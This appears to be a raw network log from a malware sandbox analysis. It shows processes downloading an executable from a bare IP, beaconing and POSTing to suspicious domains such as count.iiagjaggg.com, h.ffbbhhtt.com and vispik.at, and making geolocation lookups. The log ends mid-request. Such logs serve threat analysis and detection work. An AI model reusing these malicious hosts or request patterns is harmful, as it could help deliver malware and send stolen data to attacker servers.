                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: R46pAfw8KLJ/lvzsukKIv+4YD5yFxL6wrQ+tKWKZWBFfCMOpzbPVDt0aO0TRJm1oXAwzN8dv0uLE8ssAJ3s5VA==
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-us
                                    GET
                                    https://www.facebook.com/ads/manager/account_settings/account_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /ads/manager/account_settings/account_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Response
                                    HTTP/1.1 302 Found
                                    Set-Cookie: sb=s4oWZDVwjQLgxv2h5RDvOyYT; expires=Tue, 18-Mar-2025 04:08:19 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-resource-policy: same-origin
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: jlI+0BnKTmSLz3YKJdVpEBYgfF28BIQ6nbdU3hde6O2TP4b97z0WXgQn21NCqEQ9VvPTcu0myh2DgsfA1IpRPQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                    Content-Length: 0
                                  • flag-us
                                    GET
                                    https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                    ss31.exe
                                    Remote address:
                                    157.240.5.35:443
                                    Request
                                    GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                    Host: www.facebook.com
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-prefers-color-scheme: light
                                    Upgrade-Insecure-Requests: 1
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Cookie: sb=s4oWZDVwjQLgxv2h5RDvOyYT
                                    Response
                                    HTTP/1.1 200 OK
                                    Vary: Accept-Encoding
                                    Set-Cookie: fr=0XH6RTmOjgi67p9Wp..BkFoqz.PL.AAA.0.0.BkFoqz.AWXUA0TYwwg; expires=Sat, 17-Jun-2023 04:08:18 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'unsafe-eval';style-src fonts.googleapis.com *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ v.whatsapp.net *.fbsbx.com *.fb.com;font-src data: *.gstatic.com *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com *.tenor.co media.tenor.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net *.giphy.com connect.facebook.net *.carriersignal.info blob: android-webview-video-poster: googleads.g.doubleclick.net www.googleadservices.com *.whatsapp.net *.fb.com *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com https://*.giphy.com data:;frame-src *.doubleclick.net *.google.com *.facebook.com www.googleadservices.com *.fbsbx.com fbsbx.com data: www.instagram.com *.fbcdn.net https://paywithmybank.com https://sandbox.paywithmybank.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;
                                    x-fb-rlafr: 0
                                    document-policy: force-load-at-top
                                    cross-origin-opener-policy: same-origin-allow-popups
                                    Pragma: no-cache
                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    X-Frame-Options: DENY
                                    origin-agent-cluster: ?0
                                    Strict-Transport-Security: max-age=15552000; preload
                                    Content-Type: text/html; charset="utf-8"
                                    X-FB-Debug: 176bx2vWp+MiOOYNC+2VGtuRiUKCnGwpu9J/rvVJGI8WiCujDZY13SC+4tWEFqUOA/VwKUnhvzq0tjHDY8F6nQ==
                                    Date: Sun, 19 Mar 2023 04:08:19 GMT
                                    Transfer-Encoding: chunked
                                    Alt-Svc: h3=":443"; ma=86400
                                    Connection: keep-alive
                                  • flag-de
                                    GET
                                    http://77.91.84.172/s.exe
                                    Remote address:
                                    77.91.84.172:80
                                    Request
                                    GET /s.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 77.91.84.172
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Last-Modified: Sun, 19 Mar 2023 04:06:34 GMT
                                    ETag: "52600-5f738efacc930"
                                    Accept-Ranges: bytes
                                    Content-Length: 337408
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdos-program
                                  • flag-us
                                    DNS
                                    count.iiagjaggg.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    count.iiagjaggg.com
                                    IN A
                                    Response
                                    count.iiagjaggg.com
                                    IN A
                                    45.66.159.179
                                  • flag-us
                                    DNS
                                    35.5.240.157.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    35.5.240.157.in-addr.arpa
                                    IN PTR
                                    Response
                                    35.5.240.157.in-addr.arpa
                                    IN PTR
                                    edge-star-mini-shv-01-mad2.facebook.com
                                  • flag-us
                                    DNS
                                    172.84.91.77.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    172.84.91.77.in-addr.arpa
                                    IN PTR
                                    Response
                                    172.84.91.77.in-addr.arpa
                                    IN PTR
                                    wet-lowaezanetwork
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295279&key=1395450b12c9ce7aa49d89a66f4c318f HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295331&key=3f6bc3d05f1298fdd84c855a884a79db HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295281&key=245e0e54c838d36f90ed8c7aa82720b5 HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    GET
                                    http://count.iiagjaggg.com/check/safe
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    GET /check/safe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    POST
                                    http://count.iiagjaggg.com/check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10
                                    ss31.exe
                                    Remote address:
                                    45.66.159.179:80
                                    Request
                                    POST /check/?sid=295333&key=012f022a9abcd0d1fd0e47bff2784b10 HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                    Content-Length: 256
                                    Host: count.iiagjaggg.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    X-Powered-By: PHP/7.4.30
                                  • flag-us
                                    DNS
                                    179.159.66.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    179.159.66.45.in-addr.arpa
                                    IN PTR
                                    Response
                                    179.159.66.45.in-addr.arpa
                                    IN PTR
                                    179 159-66-45rdns scalablednscom
                                  • flag-us
                                    DNS
                                    ip-api.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ip-api.com
                                    IN A
                                    Response
                                    ip-api.com
                                    IN A
                                    208.95.112.1
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:24 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 57
                                    X-Rl: 43
                                  • flag-us
                                    GET
                                    http://ip-api.com/json/?fields=8198
                                    WspService
                                    Remote address:
                                    208.95.112.1:80
                                    Request
                                    GET /json/?fields=8198 HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=utf-8
                                    Content-Length: 57
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 57
                                    X-Rl: 42
                                  • flag-us
                                    DNS
                                    h.ffbbhhtt.com
                                    WspService
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    h.ffbbhhtt.com
                                    IN A
                                    Response
                                    h.ffbbhhtt.com
                                    IN A
                                    104.21.26.69
                                    h.ffbbhhtt.com
                                    IN A
                                    172.67.168.62
                                  • flag-us
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 298
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:26 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H97No3BYF%2BAP6T4ZDrO437XjpHf5LDp%2BtraIy1BzCSmOPEJ7S%2FHEcN%2FwJxUil5h4xWeUZKdi1S7iYv8v%2FDNbswiAnEmWxlXqKWZw2eTEXv7rPlfnZlXCvlSg2BHUzA8brw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2daad3f05b7af-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    1.112.95.208.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    Response
                                    1.112.95.208.in-addr.arpa
                                    IN PTR
                                    ip-api.com
                                  • flag-us
                                    DNS
                                    69.26.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    69.26.21.104.in-addr.arpa
                                    IN PTR
                                    Response
• US
                                    DNS
                                    126.135.241.8.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    126.135.241.8.in-addr.arpa
                                    IN PTR
                                    Response
• US
                                    DNS
                                    76.38.195.152.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    76.38.195.152.in-addr.arpa
                                    IN PTR
                                    Response
• US
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 298
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:27 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QkQNRrMu9nLlSMT%2Fbg98jOkjZbrGOiHxmvGy5XdK%2FqIZ8uf2oWQdYxjzLj4uTH9uiOKTDGs9zi4FS15%2B7R0ToUwUkvwxKzizs5ea4A2qrSnAffQd8BVANU97NxZYDVrRgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2dab17a35d0b5-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
• US
                                    POST
                                    https://h.ffbbhhtt.com/api6.php
                                    WspService
                                    Remote address:
                                    104.21.26.69:443
                                    Request
                                    POST /api6.php HTTP/1.1
                                    Accept: */*
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                    Host: h.ffbbhhtt.com
                                    Content-Length: 270
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:28 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bXKxS%2BPT3tlCh%2FuGOp8%2FkVJed1PB3Pc0FPon70vbFp50N6JbvgMrev5XSIrtmlsmexDKFF6017W3492CyqortpwyBnFtSbbeZdRCGm8X6MyUx%2BGAhUXDZCHzd2Ad92vEjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2dab5e80cb7f2-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
• US
                                    DNS
                                    vispik.at
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    vispik.at
                                    IN A
                                    Response
                                    vispik.at
                                    IN A
                                    176.226.127.181
                                    vispik.at
                                    IN A
                                    222.236.49.124
                                    vispik.at
                                    IN A
                                    190.229.19.7
                                    vispik.at
                                    IN A
                                    211.53.230.67
                                    vispik.at
                                    IN A
                                    123.140.161.243
                                    vispik.at
                                    IN A
                                    187.245.185.123
                                    vispik.at
                                    IN A
                                    187.224.55.97
                                    vispik.at
                                    IN A
                                    195.158.3.162
                                    vispik.at
                                    IN A
                                    86.122.83.142
                                    vispik.at
                                    IN A
                                    187.156.88.173
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qnkwv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 268
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:31 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 8
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://djaxocje.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 238
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:31 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• TW
                                    GET
                                    http://34.80.59.191/win.pac
                                    Remote address:
                                    34.80.59.191:80
                                    Request
                                    GET /win.pac HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: WinHttp-Autoproxy-Service/5.1
                                    Host: 34.80.59.191
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:32 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 260
                                    Last-Modified: Mon, 26 Sep 2022 09:23:59 GMT
                                    Connection: keep-alive
                                    ETag: "63316faf-104"
                                    Accept-Ranges: bytes
• US
                                    DNS
                                    181.127.226.176.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    181.127.226.176.in-addr.arpa
                                    IN PTR
                                    Response
                                    181.127.226.176.in-addr.arpa
                                    IN PTR
netacc-gpn-6-127-181.pool.yettel.hu
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://xjjinqpvlc.com/
